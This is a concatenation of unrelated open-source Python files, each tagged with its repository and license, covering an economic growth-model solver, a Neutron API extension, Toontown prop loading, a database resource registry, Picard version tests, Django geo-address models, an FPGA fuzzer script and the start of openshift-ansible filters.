            optimal interest rate
        x : vector
            intensity vector
        p : vector
            optimal price vector
        """
        LB, UB = self.bounds()

        for _ in range(maxit):
            gamma = (LB + UB) / 2
            # The dual game (prices) drives the interest-rate bisection;
            # note the strict inequality, unlike expansion()
            V = self.zerosum(gamma=gamma, dual=True)[0]
            if V > 0:
                LB = gamma
            else:
                UB = gamma
            if abs(UB - LB) < tol:
                break

        # BUGFIX: compute strategies after the loop (see expansion())
        gamma = (UB + LB) / 2
        p = self.zerosum(gamma=gamma, dual=True)[1]
        x = self.zerosum(gamma=gamma)[1]

        return gamma, x, p
|
QuantEcon/QuantEcon.notebooks
|
dependencies/neumann.py
|
Python
|
bsd-3-clause
| 8,926
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from neutron.api import extensions
_ALIAS = 'project-id'
class Project_id(extensions.ExtensionDescriptor):
    """Extension that indicates that project_id is enabled.

    This extension indicates that the Keystone V3 'project_id' field
    is supported in the API.
    """

    # Runs at class-definition time (i.e. on module import): registers the
    # alias as always supported, independent of any particular plugin.
    extensions.register_custom_supported_check(
        _ALIAS, lambda: True, plugin_agnostic=True
    )

    @classmethod
    def get_name(cls):
        # Human-readable extension name
        return "project_id field enabled"

    @classmethod
    def get_alias(cls):
        # Machine-readable alias shown in API extension listings
        return _ALIAS

    @classmethod
    def get_description(cls):
        return "Extension that indicates that project_id field is enabled."

    @classmethod
    def get_updated(cls):
        # Timestamp of the last change to this extension's definition
        return "2016-09-09T09:09:09-09:09"

    @classmethod
    def get_resources(cls):
        # No new REST resources are introduced by this extension
        return []

    def get_extended_resources(self, version):
        # No existing resources gain attributes either; this extension is
        # purely a capability flag.
        return {}
|
sebrandon1/neutron
|
neutron/extensions/project_id.py
|
Python
|
apache-2.0
| 1,418
|
from pandac.PandaModules import *
from direct.actor import Actor
from direct.directnotify import DirectNotifyGlobal
from otp.otpbase import OTPGlobals
import random
Props = ((5, 'partyBall', 'partyBall'),
(5,
'feather',
'feather-mod',
'feather-chan'),
(5, 'lips', 'lips'),
(5, 'lipstick', 'lipstick'),
(5, 'hat', 'hat'),
(5, 'cane', 'cane'),
(5,
'cubes',
'cubes-mod',
'cubes-chan'),
(5, 'ladder', 'ladder2'),
(4,
'fishing-pole',
'fishing-pole-mod',
'fishing-pole-chan'),
(5,
'1dollar',
'1dollar-bill-mod',
'1dollar-bill-chan'),
(5, 'big-magnet', 'magnet'),
(5,
'hypno-goggles',
'hypnotize-mod',
'hypnotize-chan'),
(5, 'slideshow', 'av_screen'),
(5,
'banana',
'banana-peel-mod',
'banana-peel-chan'),
(5,
'rake',
'rake-mod',
'rake-chan'),
(5,
'marbles',
'marbles-mod',
'marbles-chan'),
(5,
'tnt',
'tnt-mod',
'tnt-chan'),
(5, 'trapdoor', 'trapdoor'),
(5, 'quicksand', 'quicksand'),
(5, 'traintrack', 'traintrack2'),
(5, 'train', 'train'),
(5, 'megaphone', 'megaphone'),
(5, 'aoogah', 'aoogah'),
(5, 'bikehorn', 'bikehorn'),
(5, 'bugle', 'bugle'),
(5, 'elephant', 'elephant'),
(5, 'fog_horn', 'fog_horn'),
(5, 'whistle', 'whistle'),
(5, 'singing', 'singing'),
(3.5, 'creampie', 'tart'),
(5, 'fruitpie-slice', 'fruit-pie-slice'),
(5, 'creampie-slice', 'cream-pie-slice'),
(5,
'birthday-cake',
'birthday-cake-mod',
'birthday-cake-chan'),
(5, 'wedding-cake', 'wedding_cake'),
(3.5, 'squirting-flower', 'squirting-flower'),
(5,
'glass',
'glass-mod',
'glass-chan'),
(4, 'water-gun', 'water-gun'),
(3.5, 'bottle', 'bottle'),
(5,
'firehose',
'firehose-mod',
'firehose-chan'),
(5, 'hydrant', 'battle_hydrant'),
(4,
'stormcloud',
'stormcloud-mod',
'stormcloud-chan'),
(5, 'geyser', 'geyser'),
(3.5, 'button', 'button'),
(5,
'flowerpot',
'flowerpot-mod',
'flowerpot-chan'),
(5,
'sandbag',
'sandbag-mod',
'sandbag-chan'),
(4,
'anvil',
'anvil-mod',
'anvil-chan'),
(5,
'weight',
'weight-mod',
'weight-chan'),
(5,
'safe',
'safe-mod',
'safe-chan'),
(5,
'piano',
'piano-mod',
'piano-chan'),
(5,
'rake-react',
'rake-step-mod',
'rake-step-chan'),
(5, 'pad', 'pad'),
(4,
'propeller',
'propeller-mod',
'propeller-chan'),
(5,
'calculator',
'calculator-mod',
'calculator-chan'),
(5, 'rollodex', 'roll-o-dex'),
(5, 'rubber-stamp', 'rubber-stamp'),
(5,
'rubber-stamp-pad',
'rubber-stamp-pad-mod',
'rubber-stamp-pad-chan'),
(5,
'smile',
'smile-mod',
'smile-chan'),
(5, 'golf-club', 'golf-club'),
(5, 'golf-ball', 'golf-ball'),
(5, 'redtape', 'redtape'),
(5, 'redtape-tube', 'redtape-tube'),
(5, 'bounced-check', 'bounced-check'),
(5,
'calculator',
'calculator-mod',
'calculator-chan'),
(3.5,
'clip-on-tie',
'clip-on-tie-mod',
'clip-on-tie-chan'),
(5, 'pen', 'pen'),
(5, 'pencil', 'pencil'),
(3.5, 'phone', 'phone'),
(3.5, 'receiver', 'receiver'),
(5, 'sharpener', 'sharpener'),
(3.5, 'shredder', 'shredder'),
(3.5,
'shredder-paper',
'shredder-paper-mod',
'shredder-paper-chan'),
(5, 'watercooler', 'watercooler'),
(5, 'dagger', 'dagger'),
(5, 'card', 'card'),
(5, 'baseball', 'baseball'),
(5, 'bird', 'bird'),
(5, 'can', 'can'),
(5, 'cigar', 'cigar'),
(5, 'evil-eye', 'evil-eye'),
(5, 'gavel', 'gavel'),
(5, 'half-windsor', 'half-windsor'),
(5, 'lawbook', 'lawbook'),
(5, 'newspaper', 'newspaper'),
(5, 'pink-slip', 'pink-slip'),
(5,
'teeth',
'teeth-mod',
'teeth-chan'),
(5, 'power-tie', 'power-tie'),
(3.5, 'spray', 'spray'),
(3.5, 'splash', 'splash'),
(3.5,
'splat',
'splat-mod',
'splat-chan'),
(3.5,
'stun',
'stun-mod',
'stun-chan'),
(3.5, 'glow', 'glow'),
(3.5,
'suit_explosion',
'suit_explosion-mod',
'suit_explosion-chan'),
(3.5, 'suit_explosion_dust', 'dust_cloud'),
(4, 'ripples', 'ripples'),
(4, 'wake', 'wake'),
(4,
'splashdown',
'SZ_splashdown-mod',
'SZ_splashdown-chan'))
# Pie tint colors (RGBA, 0..1); applied to splat variants in
# PropPool.makeVariant.
CreampieColor = VBase4(250.0 / 255.0, 241.0 / 255.0, 24.0 / 255.0, 1.0)
FruitpieColor = VBase4(55.0 / 255.0, 40.0 / 255.0, 148.0 / 255.0, 1.0)
BirthdayCakeColor = VBase4(253.0 / 255.0, 119.0 / 255.0, 220.0 / 255.0, 1.0)
# Maps pie name -> (splat scale factor, splat color); consumed by the
# 'splat-<name>' branch of PropPool.makeVariant.
Splats = {'tart': (0.3, FruitpieColor),
 'fruitpie-slice': (0.5, FruitpieColor),
 'creampie-slice': (0.5, CreampieColor),
 'fruitpie': (0.7, FruitpieColor),
 'creampie': (0.7, CreampieColor),
 'birthday-cake': (0.9, BirthdayCakeColor)}
# Prop names that are not plain entries from the Props table: after the
# base model loads, PropPool.makeVariant applies a per-name tweak
# (rescale, recolor, retexture, bin setup, sub-node extraction).
Variants = ('tart',
 'fruitpie',
 'splat-tart',
 'dust',
 'kapow',
 'double-windsor',
 'splat-fruitpie-slice',
 'splat-creampie-slice',
 'splat-fruitpie',
 'splat-creampie',
 'splat-birthday-cake',
 'splash-from-splat',
 'clip-on-tie',
 'lips',
 'small-magnet',
 '5dollar',
 '10dollar',
 'suit_explosion',
 'quicksand',
 'trapdoor',
 'geyser',
 'ship',
 'trolley',
 'traintrack')
class PropPool:
    """Lazy-loading cache of battle prop models and actors, keyed by name.

    Prop definitions come from the module-level Props table; 'variant'
    props reuse another prop's files and get visual tweaks applied in
    makeVariant().  At most maxPoolSize props stay loaded; the oldest is
    evicted first.
    """
    notify = DirectNotifyGlobal.directNotify.newCategory('PropPool')

    def __init__(self):
        # name -> loaded master NodePath/Actor
        self.props = {}
        # load-ordered list of masters, used for oldest-first eviction
        self.propCache = []
        # name -> tuple of model path (plus anim path for actors)
        self.propStrings = {}
        # name -> 'model' (static) or 'actor' (animated)
        self.propTypes = {}
        self.maxPoolSize = base.config.GetInt('prop-pool-size', 8)
        # Register every entry of the Props table:
        # (phase, name, model[, anim]) -- 4-tuples become animated actors
        for p in Props:
            phase = p[0]
            propName = p[1]
            modelName = p[2]
            if len(p) == 4:
                animName = p[3]
                propPath = self.getPath(phase, modelName)
                animPath = self.getPath(phase, animName)
                self.propTypes[propName] = 'actor'
                self.propStrings[propName] = (propPath, animPath)
            else:
                propPath = self.getPath(phase, modelName)
                self.propTypes[propName] = 'model'
                self.propStrings[propName] = (propPath,)
        # Variant props below share files with a base prop; their visual
        # differences are applied later in makeVariant().
        propName = 'tart'
        self.propStrings[propName] = (self.getPath(3.5, 'tart'),)
        self.propTypes[propName] = 'model'
        propName = 'fruitpie'
        self.propStrings[propName] = (self.getPath(3.5, 'tart'),)
        self.propTypes[propName] = 'model'
        propName = 'double-windsor'
        self.propStrings[propName] = (self.getPath(5, 'half-windsor'),)
        self.propTypes[propName] = 'model'
        splatAnimFileName = self.getPath(3.5, 'splat-chan')
        # One 'splat-<pie>' actor per entry in the Splats table
        for splat in Splats.keys():
            propName = 'splat-' + splat
            self.propStrings[propName] = (self.getPath(3.5, 'splat-mod'), splatAnimFileName)
            self.propTypes[propName] = 'actor'
        propName = 'splash-from-splat'
        self.propStrings[propName] = (self.getPath(3.5, 'splat-mod'), splatAnimFileName)
        self.propTypes[propName] = 'actor'
        propName = 'small-magnet'
        self.propStrings[propName] = (self.getPath(5, 'magnet'),)
        self.propTypes[propName] = 'model'
        propName = '5dollar'
        self.propStrings[propName] = (self.getPath(5, '1dollar-bill-mod'), self.getPath(5, '1dollar-bill-chan'))
        self.propTypes[propName] = 'actor'
        propName = '10dollar'
        self.propStrings[propName] = (self.getPath(5, '1dollar-bill-mod'), self.getPath(5, '1dollar-bill-chan'))
        self.propTypes[propName] = 'actor'
        propName = 'dust'
        self.propStrings[propName] = (self.getPath(5, 'dust-mod'), self.getPath(5, 'dust-chan'))
        self.propTypes[propName] = 'actor'
        propName = 'kapow'
        self.propStrings[propName] = (self.getPath(5, 'kapow-mod'), self.getPath(5, 'kapow-chan'))
        self.propTypes[propName] = 'actor'
        propName = 'ship'
        self.propStrings[propName] = ('phase_5/models/props/ship.bam',)
        self.propTypes[propName] = 'model'
        propName = 'trolley'
        self.propStrings[propName] = ('phase_4/models/modules/trolley_station_TT',)
        self.propTypes[propName] = 'model'

    def getPath(self, phase, model):
        # Standard location of prop assets inside a content phase
        return 'phase_%s/models/props/%s' % (phase, model)

    def makeVariant(self, name):
        """Apply the per-name tweak that turns a freshly loaded base model
        into the named variant (rescale, recolor, retexture, bins, ...).
        """
        if name == 'tart':
            self.props[name].setScale(0.5)
        elif name == 'fruitpie':
            self.props[name].setScale(0.75)
        elif name == 'double-windsor':
            self.props[name].setScale(1.5)
        elif name[:6] == 'splat-':
            # Scale factor and color come from the Splats table
            prop = self.props[name]
            scale = prop.getScale() * Splats[name[6:]][0]
            prop.setScale(scale)
            prop.setColor(Splats[name[6:]][1])
        elif name == 'splash-from-splat':
            self.props[name].setColor(0.75, 0.75, 1.0, 1.0)
        elif name == 'clip-on-tie':
            tie = self.props[name]
            tie.getChild(0).setHpr(23.86, -16.03, 9.18)
        elif name == 'small-magnet':
            self.props[name].setScale(0.5)
        elif name == 'shredder-paper':
            paper = self.props[name]
            paper.setPosHpr(2.22, -0.95, 1.16, -48.61, 26.57, -111.51)
            paper.flattenMedium()
        elif name == 'lips':
            lips = self.props[name]
            lips.setPos(0, 0, -3.04)
            lips.flattenMedium()
        elif name == '5dollar':
            # Same bill geometry as 1dollar, retextured
            tex = loader.loadTexture('phase_5/maps/dollar_5.jpg')
            tex.setMinfilter(Texture.FTLinearMipmapLinear)
            tex.setMagfilter(Texture.FTLinear)
            self.props[name].setTexture(tex, 1)
        elif name == '10dollar':
            tex = loader.loadTexture('phase_5/maps/dollar_10.jpg')
            tex.setMinfilter(Texture.FTLinearMipmapLinear)
            tex.setMagfilter(Texture.FTLinear)
            self.props[name].setTexture(tex, 1)
        elif name == 'dust':
            # Give the clouds a fixed back-to-front draw order
            bin = 110
            for cloudNum in range(1, 12):
                cloudName = '**/cloud' + str(cloudNum)
                cloud = self.props[name].find(cloudName)
                cloud.setBin('fixed', bin)
                bin -= 10
        elif name == 'kapow':
            # Letters must render on top of the explosion burst
            l = self.props[name].find('**/letters')
            l.setBin('fixed', 20)
            e = self.props[name].find('**/explosion')
            e.setBin('fixed', 10)
        elif name == 'suit_explosion':
            # Randomly hide two of the three word overlays, leaving one
            joints = ['**/joint_scale_POW', '**/joint_scale_BLAM', '**/joint_scale_BOOM']
            joint = random.choice(joints)
            self.props[name].find(joint).hide()
            joints.remove(joint)
            joint = random.choice(joints)
            self.props[name].find(joint).hide()
        elif name == 'quicksand' or name == 'trapdoor':
            # Rendered like a shadow decal on the floor
            p = self.props[name]
            p.setBin('shadow', -5)
            p.setDepthWrite(0)
            p.getChild(0).setPos(0, 0, OTPGlobals.FloorOffset)
        elif name == 'traintrack' or name == 'traintrack2':
            prop = self.props[name]
            prop.find('**/tunnel3').hide()
            prop.find('**/tunnel2').hide()
            prop.find('**/tracksA').setPos(0, 0, OTPGlobals.FloorOffset)
        elif name == 'geyser':
            # Build a looping 12fps flipbook from the Splash* frames
            p = self.props[name]
            s = SequenceNode('geyser')
            p.findAllMatches('**/Splash*').reparentTo(NodePath(s))
            s.loop(0)
            s.setFrameRate(12)
            p.attachNewNode(s)
        elif name == 'ship':
            # Keep only the relevant sub-node as the cached master
            self.props[name] = self.props[name].find('**/ship_gag')
        elif name == 'trolley':
            self.props[name] = self.props[name].find('**/trolley_car')

    def unloadProps(self):
        # Release every cached master (tuple placeholders are skipped)
        for p in self.props.values():
            if type(p) != type(()):
                self.__delProp(p)
        self.props = {}
        self.propCache = []

    def getProp(self, name):
        # Public accessor: always hands out a copy of the cached master
        return self.__getPropCopy(name)

    def __getPropCopy(self, name):
        # Load (and variant-tweak) the master on first use, then return a
        # fresh copy so callers can freely reparent/modify it.
        # NOTE: has_key() is Python 2 only.
        if self.propTypes[name] == 'actor':
            if not self.props.has_key(name):
                prop = Actor.Actor()
                prop.loadModel(self.propStrings[name][0])
                animDict = {}
                animDict[name] = self.propStrings[name][1]
                prop.loadAnims(animDict)
                prop.setName(name)
                self.storeProp(name, prop)
                if name in Variants:
                    self.makeVariant(name)
            return Actor.Actor(other=self.props[name])
        else:
            if not self.props.has_key(name):
                prop = loader.loadModel(self.propStrings[name][0])
                prop.setName(name)
                self.storeProp(name, prop)
                if name in Variants:
                    self.makeVariant(name)
            return self.props[name].copyTo(hidden)

    def storeProp(self, name, prop):
        self.props[name] = prop
        self.propCache.append(prop)
        if len(self.props) > self.maxPoolSize:
            # Evict the oldest loaded prop to bound memory use
            oldest = self.propCache.pop(0)
            del self.props[oldest.getName()]
            self.__delProp(oldest)
        self.notify.debug('props = %s' % self.props)
        self.notify.debug('propCache = %s' % self.propCache)

    def getPropType(self, name):
        return self.propTypes[name]

    def __delProp(self, prop):
        # Actors need cleanup() to stop playing; plain models just detach
        if prop == None:
            self.notify.warning('tried to delete null prop!')
            return
        if isinstance(prop, Actor.Actor):
            prop.cleanup()
        else:
            prop.removeNode()
        return


# Module-level singleton used throughout the battle code
globalPropPool = PropPool()
|
ksmit799/Toontown-Source
|
toontown/battle/BattleProps.py
|
Python
|
mit
| 13,029
|
"""
Resource Registry defines the constants mapping among database types,
drivers, datasources and adapters.
All resources should be registered here in order to locate them by
the resource type.
The resource types are defined first. The registry should have this
format:
REGISTRY = {
RESOURCE_TYPE1 => { ENTRY1 => ( MODULE, CLASS ),
ENTRY2 => ( MODULE, CLASS ),
...
},
RESOURCE_TYPE2 => { ENTRY1 => ( MODULE, CLASS ),
ENTRY2 => ( MODULE, CLASS ),
...
},
}
"""
# Extract "117" from the SVN keyword string '$Revision: 117 $'
__version__='$Revision: 117 $'[11:-2]

# Resource type identifier for MySQL-backed resources
MYSQL = 'mysql'

# All resource types known to this registry
RESOURCE_TYPES = [ MYSQL ]

# resource type -> { entry name -> (module path, class name) }
# Entry names select the role: driver/connection classes, pooled and
# plain datasources, and the SQL adapter for that database type.
RESOURCE_REGISTRY = {
    MYSQL : { '__driver__' : ( 'proof.driver.MySQLConnection', 'MySQLConnection' ),
              '__connection__' : ( 'proof.driver.MySQLConnection', 'MySQLConnection' ),
              '__pooledconnection__' : ( 'proof.driver.MySQLPooledConnection', 'MySQLPooledConnection' ),
              '__datasource__' : ( 'proof.datasource.MySQLDataSource', 'MySQLDataSource' ),
              '__pooleddatasource__' : ( 'proof.datasource.MySQLPooledDataSource', 'MySQLPooledDataSource' ),
              '__adapter__' : ( 'proof.adapter.MySQLAdapter', 'MySQLAdapter' ) },
    }
|
mattduan/proof
|
ProofRegistry.py
|
Python
|
bsd-3-clause
| 1,333
|
# -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
#
# Copyright (C) 2013-2014, 2018-2020 Laurent Monin
# Copyright (C) 2017 Sambhav Kothari
# Copyright (C) 2018 Wieland Hoffmann
# Copyright (C) 2018-2020 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import unittest
from test.picardtestcase import PicardTestCase
from picard import (
api_versions,
api_versions_tuple,
version_from_string,
version_to_string,
)
from picard.version import (
Version,
VersionError,
)
class VersionsTest(PicardTestCase):
    """Tests for picard.version.Version and the module-level helpers
    version_from_string / version_to_string, including the deprecated
    top-level picard aliases and the api_versions ordering."""

    def test_version_conversion(self):
        # Long-form round trip: Version -> '1.1.0.final0' -> Version
        versions = (
            (Version(1, 1, 0, 'final', 0), '1.1.0.final0'),
            (Version(0, 0, 1, 'dev', 1), '0.0.1.dev1'),
            (Version(1, 1, 0, 'dev', 0), '1.1.0.dev0'),
            (Version(999, 999, 999, 'dev', 999), '999.999.999.dev999'),
            (Version(1, 1, 2, 'alpha', 2), '1.1.2.alpha2'),
            (Version(1, 1, 2, 'a', 2), '1.1.2.alpha2'),
            (Version(1, 1, 2, 'beta', 2), '1.1.2.beta2'),
            (Version(1, 1, 2, 'b', 2), '1.1.2.beta2'),
            (Version(1, 1, 2, 'rc', 2), '1.1.2.rc2'),
        )
        for v, s in versions:
            self.assertEqual(version_to_string(v), s)
            self.assertEqual(str(v), s)
            self.assertEqual(v, Version.from_string(s))
            self.assertEqual(v, version_from_string(s))

    def test_version_conversion_short(self):
        # Short (PEP 440-like) form round trip: '1.1.2a2' etc.
        versions = (
            (Version(1, 1, 0, 'final', 0), '1.1'),
            (Version(1, 1, 1, 'final', 0), '1.1.1'),
            (Version(0, 0, 1, 'dev', 1), '0.0.1.dev1'),
            (Version(1, 1, 0, 'dev', 0), '1.1.0.dev0'),
            (Version(1, 1, 2, 'alpha', 2), '1.1.2a2'),
            (Version(1, 1, 2, 'a', 2), '1.1.2a2'),
            (Version(1, 1, 2, 'beta', 2), '1.1.2b2'),
            (Version(1, 1, 2, 'b', 2), '1.1.2b2'),
            (Version(1, 1, 2, 'rc', 2), '1.1.2rc2'),
        )
        for v, s in versions:
            self.assertEqual(version_to_string(v, short=True), s)
            self.assertEqual(v.to_string(short=True), s)
            self.assertEqual(v, Version.from_string(s))
            self.assertEqual(v, version_from_string(s))

    def test_version_to_string_invalid_identifier(self):
        # 'xx' is not one of the allowed release identifiers
        invalid = (1, 0, 2, 'xx', 0)
        self.assertRaises(VersionError, version_to_string, invalid)

    def test_version_from_string_underscores(self):
        l, s = (1, 1, 0, 'dev', 0), '1_1_0_dev_0'
        self.assertEqual(l, version_from_string(s))

    def test_version_from_string_prefixed(self):
        # Arbitrary text before the version digits is ignored by parsing
        l, s = (1, 1, 0, 'dev', 0), 'anything_28_1_1_0_dev_0'
        self.assertEqual(l, version_from_string(s))

    def test_version_single_digit(self):
        # A bare major version expands to X.0.0.final0
        l, s = (2, 0, 0, 'final', 0), '2'
        self.assertEqual(l, version_from_string(s))
        self.assertEqual(l, Version(2))

    def test_version_from_string_invalid(self):
        # BUGFIX: this previously called version_to_string, so the
        # from_string parsing path was never exercised and the test
        # passed for the wrong reason. '28x' is not a valid component.
        invalid = 'anything_28x_1_0_dev_0'
        self.assertRaises(VersionError, version_from_string, invalid)

    def test_version_from_string_prefixed_final(self):
        l, s = (1, 1, 0, 'final', 0), 'anything_28_1_1_0'
        self.assertEqual(l, version_from_string(s))

    def test_from_string_invalid_identifier(self):
        # A release identifier without its number (or garbage after it)
        # must be rejected
        self.assertRaises(VersionError, version_from_string, '1.1.0dev')
        self.assertRaises(VersionError, version_from_string, '1.1.0devx')

    def test_version_from_string_invalid_partial(self):
        self.assertRaises(VersionError, version_from_string, '1dev')
        self.assertRaises(VersionError, version_from_string, '1.0dev')
        self.assertRaises(VersionError, version_from_string, '123.')

    @unittest.skipUnless(len(api_versions) > 1, "api_versions do not have enough elements")
    def test_api_versions_1(self):
        """Check api versions format and order (from oldest to newest)"""
        for i in range(len(api_versions) - 1):
            a = version_from_string(api_versions[i])
            b = version_from_string(api_versions[i+1])
            self.assertLess(a, b)

    @unittest.skipUnless(len(api_versions_tuple) > 1, "api_versions_tuple do not have enough elements")
    def test_api_versions_tuple_1(self):
        """Check api versions format and order (from oldest to newest)"""
        for i in range(len(api_versions_tuple) - 1):
            a = api_versions_tuple[i]
            b = api_versions_tuple[i+1]
            self.assertLess(a, b)

    def test_version_invalid_new(self):
        # Constructor validation: non-int parts, None, bad identifier
        self.assertRaises(VersionError, Version, '1', 'a')
        self.assertRaises(VersionError, Version, None, 0)
        self.assertRaises(VersionError, Version, 1, 0, 0, 'final', None)
        self.assertRaises(VersionError, Version, 1, 0, 0, 'invalid', 0)

    def test_sortkey(self):
        # Identifiers map to ints so pre-releases sort before 'final'
        self.assertEqual((2, 1, 3, 4, 2), Version(2, 1, 3, 'final', 2).sortkey)
        self.assertEqual((2, 0, 0, 1, 0), Version(2, 0, 0, 'a', 0).sortkey)
        self.assertEqual((2, 0, 0, 1, 0), Version(2, 0, 0, 'alpha', 0).sortkey)

    def test_lt(self):
        v1 = Version(2, 3, 0, 'dev', 1)
        v2 = Version(2, 3, 0, 'alpha', 1)
        self.assertLess(v1, v2)
        self.assertFalse(v2 < v2)
        # Numeric, not lexicographic: 3 < 10
        v1 = Version(2, 3, 0, 'final', 1)
        v2 = Version(2, 10, 0, 'final', 1)
        self.assertLess(v1, v2)

    def test_le(self):
        v1 = Version(2, 3, 0, 'dev', 1)
        v2 = Version(2, 3, 0, 'alpha', 1)
        self.assertLessEqual(v1, v2)
        self.assertLessEqual(v2, v2)

    def test_gt(self):
        v1 = Version(2, 3, 0, 'alpha', 1)
        v2 = Version(2, 3, 0, 'dev', 1)
        self.assertGreater(v1, v2)
        self.assertFalse(v2 > v2)

    def test_ge(self):
        v1 = Version(2, 3, 0, 'alpha', 1)
        v2 = Version(2, 3, 0, 'dev', 1)
        self.assertGreaterEqual(v1, v2)
        self.assertGreaterEqual(v2, v2)

    def test_eq(self):
        # 'alpha' and its short form 'a' compare equal
        v1 = Version(2, 3, 0, 'alpha', 1)
        v2 = Version(2, 3, 0, 'a', 1)
        v3 = Version(2, 3, 0, 'final', 1)
        self.assertEqual(v1, v1)
        self.assertEqual(v1, v2)
        self.assertFalse(v1 == v3)

    def test_ne(self):
        v1 = Version(2, 3, 0, 'alpha', 1)
        v2 = Version(2, 3, 0, 'a', 1)
        v3 = Version(2, 3, 0, 'final', 1)
        self.assertFalse(v1 != v1)
        self.assertFalse(v1 != v2)
        self.assertTrue(v1 != v3)
|
metabrainz/picard
|
test/test_versions.py
|
Python
|
gpl-2.0
| 7,014
|
# --coding: utf8--
import requests
from django.contrib.gis.db import models
from django.contrib.gis.geos import GEOSGeometry
class Country(models.Model):
    """Country model."""
    # Verbose labels stay in Russian: they are the admin-facing UI strings
    title = models.CharField(
        u'название', max_length=255)

    class Meta:
        verbose_name = u'страна'
        verbose_name_plural = u'страны'
        ordering = ['title']

    def __unicode__(self):
        return self.title
class BaseAddress(models.Model):
    """Base address class with GEO data.

    Stores a structured postal address (country down to apartment) plus an
    optional geographic point, and can look the point up via the Yandex
    geocoder.
    """
    country = models.ForeignKey(
        Country,
        verbose_name=u'страна')
    area = models.CharField(
        u'область', max_length=255, blank=True)
    subarea = models.CharField(
        u'район', max_length=255, blank=True)
    locality = models.CharField(
        u'населенный пункт', max_length=255)
    street = models.CharField(
        u'улица', max_length=255, blank=True)
    house = models.CharField(
        u'дом', max_length=50, blank=True)
    apartment = models.CharField(
        u'офис', max_length=10, blank=True)
    zip = models.CharField(
        u'почтовый индекс', max_length=10, blank=True)
    coordinates = models.PointField(
        u'координаты', blank=True, null=True)  # POINT(longitude latitude), as built by fetch_coordinates
    # Use GeoManager so that GEO queries are available on this model
    objects = models.GeoManager()

    class Meta:
        verbose_name = u'адрес'
        verbose_name_plural = u'адреса'

    def __unicode__(self):
        # Comma-joined address, skipping any blank components
        return ', '.join(part for part in [self.zip, self.country.title,
                                           self.area, self.subarea,
                                           self.locality, self.street,
                                           self.house] if part)

    def fetch_coordinates(self):
        """Fetch the object's coordinates from the Yandex geocoder.

        Returns a GEOS point on success, or None on network failure or an
        unparseable response.  NOTE(review): uses plain http — confirm the
        endpoint still accepts it (https is the documented scheme now).
        """
        query = ',+'.join(
            part for part in [self.country.title, self.area, self.subarea,
                              self.locality, self.street, self.house] if part)
        url = u'http://geocode-maps.yandex.ru/1.x/?geocode=%s&format=json' % (
            query)
        try:
            r = requests.get(url).json()
        except requests.exceptions.RequestException:
            return None
        try:
            # Yandex returns "longitude latitude" in the 'pos' field
            longitude, latitude = (r['response']['GeoObjectCollection']
                                   ['featureMember'][0]['GeoObject']['Point']
                                   ['pos']).split(' ')
            return GEOSGeometry(U'POINT(%s %s)' % (longitude, latitude))
        except (KeyError, IndexError):
            # No match found or unexpected response shape
            return None

    def get_short_address(self):
        # Compact "area, locality" form for list displays
        return ', '.join(part for part in [self.area, self.locality] if part)
class Region(models.Model):
    """Geographic region described by a polygon."""
    name = models.CharField(u'название', max_length=255)
    coordinates = models.PolygonField(u'координаты')
    # Use GeoManager so that GEO queries (e.g. containment) are available
    objects = models.GeoManager()

    class Meta:
        verbose_name = u'регион'
        verbose_name_plural = u'регионы'
        ordering = ['name']

    def __unicode__(self):
        return self.name
|
minidron/django-geoaddress
|
django_geoaddress/models.py
|
Python
|
gpl-2.0
| 3,479
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2022 F4PGA Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
import os
import random

# The fuzzer must be reproducible: the PRNG seed is supplied as a hex
# string in the SEED environment variable.  Fail with a clear message when
# it is missing instead of the opaque TypeError int(None, 16) would raise.
_seed = os.getenv("SEED")
if _seed is None:
    raise RuntimeError("SEED environment variable must be set to a hex string")
random.seed(int(_seed, 16))

from utils.spec import io_base_address

if __name__ == '__main__':
    # Generate the tilegrid specimen for the HDIO_BOT_RIGHT IO bank
    io_base_address.run('HDIO_BOT_RIGHT')
|
SymbiFlow/prjuray
|
fuzzers/002-tilegrid/hdio_bot_right/top.py
|
Python
|
isc
| 845
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# pylint: disable=too-many-lines
"""
Custom filters for use in openshift-ansible
"""
import ast
import json
import os
import pdb
import random
from base64 import b64encode
from collections import Mapping
# pylint no-name-in-module and import-error disabled here because pylint
# fails to properly detect the packages when installed in a virtualenv
from distutils.util import strtobool # pylint:disable=no-name-in-module,import-error
from operator import itemgetter
import yaml
from ansible import errors
from ansible.parsing.yaml.dumper import AnsibleDumper
# pylint: disable=import-error,no-name-in-module
from ansible.module_utils.six import iteritems, string_types, u
# pylint: disable=import-error,no-name-in-module
from ansible.module_utils.six.moves.urllib.parse import urlparse
# pyOpenSSL is an optional dependency: the certificate-parsing filters
# check HAS_OPENSSL and raise a clear filter error when it is missing.
HAS_OPENSSL = False
try:
    import OpenSSL.crypto
    HAS_OPENSSL = True
except ImportError:
    pass
# pylint: disable=C0103
def lib_utils_oo_pdb(arg):
    """ This pops you into a pdb instance where arg is the data passed in
        from the filter.
        Ex: "{{ hostvars | lib_utils_oo_pdb }}"
    """
    # Interactive debugging aid only; returns arg unchanged so the
    # filter chain keeps working after the debugger session ends.
    pdb.set_trace()
    return arg
def get_attr(data, attribute=None):
